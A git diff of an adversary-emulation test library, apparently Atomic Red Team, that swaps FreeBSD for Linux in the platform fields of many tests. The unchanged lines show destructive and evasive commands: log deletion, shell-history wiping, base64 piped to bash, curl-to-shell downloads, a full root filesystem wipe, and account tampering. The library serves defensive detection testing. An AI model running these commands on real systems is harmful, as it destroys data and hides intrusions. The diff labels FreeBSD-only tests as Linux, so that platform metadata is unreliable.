@@ -260,7 +260,7 @@ unset TMPFILE
## Atomic Test #6 - What shell is running
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux
**auto_generated_guid:** 7b38e5cc-47be-44f0-a425-390305c76c17
@@ -290,7 +290,7 @@ if $(printenv SHELL >/dev/null); then printenv SHELL; fi
## Atomic Test #7 - What shells are available
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux
**auto_generated_guid:** bf23c7dc-1004-4949-8262-4c1d1ef87702
@@ -318,7 +318,7 @@ cat /etc/shells
## Atomic Test #8 - Command line scripts
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux
**auto_generated_guid:** b04ed73c-7d43-4dc8-b563-a2fc595cba1a
@@ -377,7 +377,7 @@ unset ART
## Atomic Test #10 - Obfuscated command line scripts (freebsd)
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 5dc1d9dd-f396-4420-b985-32b1c4f79062
@@ -455,7 +455,7 @@ echo "Automated installer not implemented yet, please install chsh manually"
## Atomic Test #12 - Change login shell (freebsd)
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/sh shell, changes the users shell to sh, then deletes the art user.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 33b68b9b-4988-4caf-9600-31b7bf04227c
@@ -535,7 +535,7 @@ unset ART
## Atomic Test #14 - Environment variable scripts (freebsd)
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 663b205d-2121-48a3-a6f9-8c9d4d87dfee
@@ -622,7 +622,7 @@ apt update && apt install -y curl
## Atomic Test #16 - Detecting pipe-to-shell (freebsd)
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 1a06b1ec-0cca-49db-a222-3ebb6ef25632
+4 -10
View File
@@ -6,7 +6,6 @@ atomic_tests:
description: |
Creates and executes a simple sh script.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -30,7 +29,6 @@ atomic_tests:
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -105,7 +103,6 @@ atomic_tests:
description: |
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which results in the id command being executed.
supported_platforms:
- freebsd
- linux
executor:
name: sh
@@ -122,7 +119,6 @@ atomic_tests:
description: |
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
supported_platforms:
- freebsd
- linux
executor:
name: sh
@@ -136,7 +132,6 @@ atomic_tests:
description: |
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
supported_platforms:
- freebsd
- linux
executor:
name: sh
@@ -148,7 +143,6 @@ atomic_tests:
description: |
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
supported_platforms:
- freebsd
- linux
executor:
name: sh
@@ -173,7 +167,7 @@ atomic_tests:
description: |
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: false
@@ -210,7 +204,7 @@ atomic_tests:
description: |
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/sh shell, changes the users shell to sh, then deletes the art user.
supported_platforms:
- freebsd
- linux
dependencies:
- description: |
chsh - change login shell, must be installed
@@ -247,7 +241,7 @@ atomic_tests:
description: |
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: false
@@ -293,7 +287,7 @@ atomic_tests:
description: |
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
supported_platforms:
- freebsd
- linux
input_arguments:
remote_url:
description: url of remote payload
+4 -4
View File
@@ -20,7 +20,7 @@ Python comes with many built-in packages to interact with the underlying system,
## Atomic Test #1 - Execute shell script via python's command mode arguement
Download and execute shell script and write to file then execute locally using Python -c (command mode)
**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux
**auto_generated_guid:** 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
@@ -74,7 +74,7 @@ pip install requests
## Atomic Test #2 - Execute Python via scripts
Create Python file (.py) that downloads and executes shell script via executor arguments
**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux
**auto_generated_guid:** 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
@@ -139,7 +139,7 @@ pip install requests
## Atomic Test #3 - Execute Python via Python executables
Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux
**auto_generated_guid:** 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
@@ -206,7 +206,7 @@ pip install requests
## Atomic Test #4 - Python pty module and spawn function used to spawn sh or bash
Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux
**auto_generated_guid:** 161d694c-b543-4434-85c3-c3a433e33792
+1 -5
View File
@@ -5,7 +5,6 @@ atomic_tests:
auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
description: Download and execute shell script and write to file then execute locally using Python -c (command mode)
supported_platforms:
- freebsd
- linux
input_arguments:
script_url:
@@ -43,7 +42,6 @@ atomic_tests:
auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
description: Create Python file (.py) that downloads and executes shell script via executor arguments
supported_platforms:
- freebsd
- linux
input_arguments:
python_script_name:
@@ -97,7 +95,6 @@ atomic_tests:
description: |
Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
supported_platforms:
- freebsd
- linux
input_arguments:
python_script_name:
@@ -156,9 +153,8 @@ atomic_tests:
description: |
Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
supported_platforms:
- freebsd
- linux
dependencies:
dependencies:
- description: |
Verify if python is in the environment variable path and attempt to import requests library.
prereq_command: |
+1 -1
View File
@@ -26,7 +26,7 @@ Commands such as <code>net localgroup</code> of the [Net](https://attack.mitre.o
## Atomic Test #1 - Permission Groups Discovery (Local)
Permission Groups Discovery
**Supported Platforms:** Freebsd, macOS, Linux
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 952931a4-af0b-4335-bbbe-73c8c5b327ae
+1 -2
View File
@@ -6,9 +6,8 @@ atomic_tests:
description: |
Permission Groups Discovery
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
command: |
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
+5 -5
View File
@@ -107,7 +107,7 @@ if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
## Atomic Test #2 - rm -rf
Delete messages and security logs
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** bd8ccc45-d632-481e-b7cf-c467627d68f9
@@ -211,7 +211,7 @@ touch #{system_log_path}
## Atomic Test #5 - Truncate system log files via truncate utility (freebsd)
This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 14033063-ee04-4eaf-8f5d-ba07ca7a097c
@@ -286,7 +286,7 @@ touch #{system_log_path}
## Atomic Test #7 - Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd)
The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 369878c6-fb04-48d6-8fc2-da9d97b3e054
@@ -397,7 +397,7 @@ sudo echo '' > #{system_log_path}
## Atomic Test #10 - Overwrite FreeBSD system log via echo utility
This test overwrites the contents of system log file with an empty string using echo utility
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 11cb8ee1-97fb-4960-8587-69b8388ee9d9
@@ -498,7 +498,7 @@ touch #{system_log_path}
## Atomic Test #13 - Delete system log files via unlink utility (freebsd)
This test deletes the messages log file using unlink utility
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 45ad4abd-19bd-4c5f-a687-41f3eee8d8c2
+5 -5
View File
@@ -37,7 +37,7 @@ atomic_tests:
description: |
Delete messages and security logs
supported_platforms:
- freebsd
- linux
executor:
command: |
rm -rf /var/log/messages
@@ -86,7 +86,7 @@ atomic_tests:
description: |
This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content
supported_platforms:
- freebsd
- linux
executor:
command: |
truncate -s 0 /var/log/messages #size parameter shorthand
@@ -124,7 +124,7 @@ atomic_tests:
description: |
The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility
supported_platforms:
- freebsd
- linux
executor:
command: |
cat /dev/null > /var/log/messages #truncating the file to zero bytes
@@ -187,7 +187,7 @@ atomic_tests:
description: |
This test overwrites the contents of system log file with an empty string using echo utility
supported_platforms:
- freebsd
- linux
executor:
command: |
echo '' > /var/log/messages
@@ -234,7 +234,7 @@ atomic_tests:
description: |
This test deletes the messages log file using unlink utility
supported_platforms:
- freebsd
- linux
executor:
command: |
unlink /var/log/messages
+7 -7
View File
@@ -88,7 +88,7 @@ rm ~/.bash_history
## Atomic Test #2 - Clear sh history (rm)
Clears sh history via rm
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 448893f8-1d5d-4ae2-9017-7fcd73a7e100
@@ -144,7 +144,7 @@ echo "" > ~/.bash_history
## Atomic Test #4 - Clear sh history (echo)
Clears sh history via echo
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** a4d63cb3-9ed9-4837-9480-5bf6b09a6c96
@@ -200,7 +200,7 @@ cat /dev/null > ~/.bash_history
## Atomic Test #6 - Clear sh history (cat dev/null)
Clears sh history via cat /dev/null
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc
@@ -256,7 +256,7 @@ ln -sf /dev/null ~/.bash_history
## Atomic Test #8 - Clear sh history (ln dev/null)
Clears sh history via a symlink to /dev/null
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 3126aa7a-8768-456f-ae05-6ab2d4accfdd
@@ -312,7 +312,7 @@ truncate -s0 ~/.bash_history
## Atomic Test #10 - Clear sh history (truncate)
Clears sh history via truncate
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** e14d9bb0-c853-4503-aa89-739d5c0a5818
@@ -370,7 +370,7 @@ history -c
## Atomic Test #12 - Clear history of a bunch of shells (freebsd)
Clears the history of a bunch of different shell types by setting the history size to zero
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0
@@ -514,7 +514,7 @@ echo -e 'pwd101!\npwd101!' | passwd testuser1
## Atomic Test #16 - Disable sh History Logging with SSH -T (freebsd)
Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** ec3f2306-dd19-4c4b-bed7-92d20e9b1dee
+7 -7
View File
@@ -17,7 +17,7 @@ atomic_tests:
description: |
Clears sh history via rm
supported_platforms:
- freebsd
- linux
executor:
command: |
rm ~/.sh_history
@@ -38,7 +38,7 @@ atomic_tests:
description: |
Clears sh history via echo
supported_platforms:
- freebsd
- linux
executor:
command: |
echo "" > ~/.sh_history
@@ -59,7 +59,7 @@ atomic_tests:
description: |
Clears sh history via cat /dev/null
supported_platforms:
- freebsd
- linux
executor:
command: |
cat /dev/null > ~/.sh_history
@@ -81,7 +81,7 @@ atomic_tests:
description: |
Clears sh history via a symlink to /dev/null
supported_platforms:
- freebsd
- linux
executor:
command: |
ln -sf /dev/null ~/.sh_history
@@ -101,7 +101,7 @@ atomic_tests:
description: |
Clears sh history via truncate
supported_platforms:
- freebsd
- linux
executor:
command: |
truncate -s0 ~/.sh_history
@@ -124,7 +124,7 @@ atomic_tests:
description: |
Clears the history of a bunch of different shell types by setting the history size to zero
supported_platforms:
- freebsd
- linux
executor:
command: |
unset HISTFILE
@@ -192,7 +192,7 @@ atomic_tests:
description: |
Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog
supported_platforms:
- freebsd
- linux
dependencies:
- description: |
Install sshpass and create user account used for excuting
+3 -3
View File
@@ -34,7 +34,7 @@ There are tools available from the host operating system to perform cleanup, but
## Atomic Test #1 - Delete a single file - FreeBSD/Linux/macOS
Delete a single file from the temporary directory
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 562d737f-2fc6-4b09-8c2a-7f8ff0828480
@@ -84,7 +84,7 @@ mkdir -p #{parent_folder} && touch #{file_to_delete}
## Atomic Test #2 - Delete an entire folder - FreeBSD/Linux/macOS
Recursively delete the temporary directory and all files contained within it
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** a415f17e-ce8d-4ce2-a8b4-83b674e7017e
@@ -372,7 +372,7 @@ rm -rf / --no-preserve-root > /dev/null 2> /dev/null
## Atomic Test #9 - Delete Filesystem - FreeBSD
This test deletes the entire root filesystem of a FreeBSD system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** b5aaca7e-a48f-4f1b-8f0f-a27b8f516608
+1 -3
View File
@@ -6,7 +6,6 @@ atomic_tests:
description: |
Delete a single file from the temporary directory
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -37,7 +36,6 @@ atomic_tests:
description: |
Recursively delete the temporary directory and all files contained within it
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -182,7 +180,7 @@ atomic_tests:
description: |
This test deletes the entire root filesystem of a FreeBSD system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
supported_platforms:
- freebsd
- linux
executor:
command: |
chflags -R 0 /
+4 -4
View File
@@ -28,7 +28,7 @@ Timestomping may be used along with file name [Masquerading](https://attack.mitr
## Atomic Test #1 - Set a file's access timestamp
Stomps on the access timestamp of a file
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 5f9113d5-ed75-47ed-ba23-ea3573d05810
@@ -77,7 +77,7 @@ echo 'T1070.006 file access timestomp test' > #{target_filename}
## Atomic Test #2 - Set a file's modification timestamp
Stomps on the modification timestamp of a file
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 20ef1523-8758-4898-b5a2-d026cc3d2c52
@@ -129,7 +129,7 @@ Stomps on the create timestamp of a file
Setting the creation timestamp requires changing the system clock and reverting.
Sudo or root privileges are required to change date. Use with caution.
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b
@@ -172,7 +172,7 @@ Modifies the `modify` and `access` timestamps using the timestamps of a specifie
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 631ea661-d661-44b0-abdb-7a7f3fc08e50
-4
View File
@@ -6,7 +6,6 @@ atomic_tests:
description: |
Stomps on the access timestamp of a file
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -33,7 +32,6 @@ atomic_tests:
description: |
Stomps on the modification timestamp of a file
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -62,7 +60,6 @@ atomic_tests:
Setting the creation timestamp requires changing the system clock and reverting.
Sudo or root privileges are required to change date. Use with caution.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -88,7 +85,6 @@ atomic_tests:
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
+1 -1
View File
@@ -115,7 +115,7 @@ Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 2d7c471a-e887-4b78-b0dc-b0df1f2e0658
-1
View File
@@ -66,7 +66,6 @@ atomic_tests:
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
+1 -1
View File
@@ -91,7 +91,7 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato
## Atomic Test #3 - Stage data from Discovery.sh (freebsd)
Utilize curl to download discovery.sh and execute a basic information gathering shell script
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 4fca7b49-379d-4493-8890-d6297750fa46
+1 -1
View File
@@ -40,7 +40,7 @@ atomic_tests:
description: |
Utilize curl to download discovery.sh and execute a basic information gathering shell script
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
description: Location to save downloaded discovery.bat file
+3 -3
View File
@@ -310,7 +310,7 @@ userdel -r art
## Atomic Test #9 - Create local account (FreeBSD)
An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 95158cc9-8f6d-4889-9531-9be3f7f095e0
@@ -389,7 +389,7 @@ A system administrator may have locked and expired a user account rather than de
In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 09e3380a-fae5-4255-8b19-9950be0252cf
@@ -469,7 +469,7 @@ cat /etc/passwd |grep nobody
## Atomic Test #13 - Login as nobody (freebsd)
An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 16f6374f-7600-459a-9b16-6a88fd96d310
+3 -3
View File
@@ -123,7 +123,7 @@ atomic_tests:
description: |
An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user.
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -164,7 +164,7 @@ atomic_tests:
In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -206,7 +206,7 @@ atomic_tests:
description: |
An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin.
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
+5 -5
View File
@@ -134,7 +134,7 @@ ls -al /Applications
## Atomic Test #3 - List OS Information
Identify System Info
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** cccb070c-df86-4216-a5bc-9fb60c74e27c
@@ -244,7 +244,7 @@ sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
## Atomic Test #6 - FreeBSD VM Check via Kernel Modules
Identify virtual machine host kernel modules.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** eefe6a49-d88b-41d8-8fc2-b46822da90d3
@@ -301,7 +301,7 @@ hostname
## Atomic Test #8 - Hostname Discovery
Identify system hostname for FreeBSD, Linux and macOS systems.
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 486e88ea-4f56-470f-9b57-3f4d73f39133
@@ -433,7 +433,7 @@ set
## Atomic Test #12 - Environment variables discovery on freebsd, macos and linux
Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
**Supported Platforms:** Freebsd, macOS, Linux
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** fcbdd43f-f4ad-42d5-98f3-0218097e2720
@@ -904,7 +904,7 @@ grep vmw /proc/modules
## Atomic Test #26 - FreeBSD List Kernel Modules
Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 4947897f-643a-4b75-b3f5-bed6885749f6
+3 -6
View File
@@ -28,7 +28,6 @@ atomic_tests:
description: |
Identify System Info
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -85,7 +84,7 @@ atomic_tests:
description: |
Identify virtual machine host kernel modules.
supported_platforms:
- freebsd
- linux
executor:
command: |
kldstat | grep -i "vmm"
@@ -106,7 +105,6 @@ atomic_tests:
description: |
Identify system hostname for FreeBSD, Linux and macOS systems.
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -165,9 +163,8 @@ atomic_tests:
description: |
Identify all environment variables. Upon execution, environments variables and your path info will be displayed.
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
command: |
env
@@ -369,7 +366,7 @@ atomic_tests:
description: |
Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present.
supported_platforms:
- freebsd
- linux
executor:
command: |
kldstat
+2 -2
View File
@@ -103,7 +103,7 @@ http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/
https://perishablepress.com/list-files-folders-recursively-terminal/
**Supported Platforms:** Freebsd, macOS, Linux
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** ffc8b249-372a-4b74-adcd-e4c0430842de
@@ -147,7 +147,7 @@ rm #{output_file}
## Atomic Test #4 - Nix File and Directory Discovery 2
Find or discover files on the file system
**Supported Platforms:** Freebsd, macOS, Linux
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 13c5e1ae-605b-46c4-a79f-db28c77ff24e
+2 -4
View File
@@ -47,9 +47,8 @@ atomic_tests:
https://perishablepress.com/list-files-folders-recursively-terminal/
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
output_file:
description: Output file used to store the results.
@@ -73,9 +72,8 @@ atomic_tests:
description: |
Find or discover files on the file system
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
output_file:
description: Output file used to store the results.
+6 -6
View File
@@ -34,7 +34,7 @@ Commands such as <code>net user</code> and <code>net localgroup</code> of the [N
## Atomic Test #1 - Enumerate all accounts (Local)
Enumerate all accounts by copying /etc/passwd to another file
**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux
**auto_generated_guid:** f8aab3dd-5990-4bf8-b8ab-2226c951696f
@@ -72,7 +72,7 @@ rm -f #{output_file}
## Atomic Test #2 - View sudoers access
(requires root)
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** fed9be70-0186-4bde-9f8a-20945f9370c2
@@ -111,7 +111,7 @@ rm -f #{output_file}
## Atomic Test #3 - View accounts with UID 0
View accounts with UID 0
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** c955a599-3653-4fe5-b631-f11c00eb0397
@@ -150,7 +150,7 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #4 - List opened files by user
List opened files by user
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb
@@ -240,7 +240,7 @@ sudo apt-get install login; exit 1;
## Atomic Test #6 - Show if a user account has ever logged in remotely (freebsd)
Show if a user account has ever logged in remotely
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 0f73418f-d680-4383-8a24-87bc97fe4e35
@@ -278,7 +278,7 @@ rm -f #{output_file}
## Atomic Test #7 - Enumerate users and groups
Utilize groups and id to enumerate users and groups
**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** e6f36545-dc1e-47f0-9f48-7f730f54a02e
+1 -6
View File
@@ -6,7 +6,6 @@ atomic_tests:
description: |
Enumerate all accounts by copying /etc/passwd to another file
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
@@ -25,7 +24,6 @@ atomic_tests:
description: |
(requires root)
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -47,7 +45,6 @@ atomic_tests:
description: |
View accounts with UID 0
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -68,7 +65,6 @@ atomic_tests:
description: |
List opened files by user
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -114,7 +110,7 @@ atomic_tests:
description: |
Show if a user account has ever logged in remotely
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
@@ -133,7 +129,6 @@ atomic_tests:
description: |
Utilize groups and id to enumerate users and groups
supported_platforms:
- freebsd
- linux
- macos
executor:
+1 -1
View File
@@ -20,7 +20,7 @@ Enable traffic redirection.
Note that this test may conflict with pre-existing system configuration.
**Supported Platforms:** Freebsd, macOS, Linux
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 0ac21132-4485-4212-a681-349e8a6637cd
+1 -2
View File
@@ -8,9 +8,8 @@ atomic_tests:
Note that this test may conflict with pre-existing system configuration.
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
proxy_server:
description: Proxy server URL (host:port)
+1 -1
View File
@@ -237,7 +237,7 @@ brew install tor
This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
Upon successful execution, the tor proxy service will be launched.
**Supported Platforms:** Freebsd
**Supported Platforms:** Linux
**auto_generated_guid:** 550ec67d-a99e-408b-816a-689271b27d2a
+1 -1
View File
@@ -124,7 +124,7 @@ atomic_tests:
This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality.
Upon successful execution, the tor proxy service will be launched.
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: |
+1 -1
View File
@@ -19,7 +19,7 @@ SSH keys can also be added to accounts on network devices, such as with the `ip
Modify contents of <user-home>/.ssh/authorized_keys to maintain persistence on victim host.
If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.
**Supported Platforms:** Freebsd, macOS, Linux
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 342cc723-127c-4d3a-8292-9c0c6b4ecadc
+1 -2
View File
@@ -9,9 +9,8 @@ atomic_tests:
Modify contents of <user-home>/.ssh/authorized_keys to maintain persistence on victim host.
If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
name: sh
elevation_required: false
+7 -7
View File
@@ -72,7 +72,7 @@ On Windows, adversaries may use various utilities to download tools, such as `co
## Atomic Test #1 - rsync remote file copy (push)
Utilize rsync to perform a remote file copy (push)
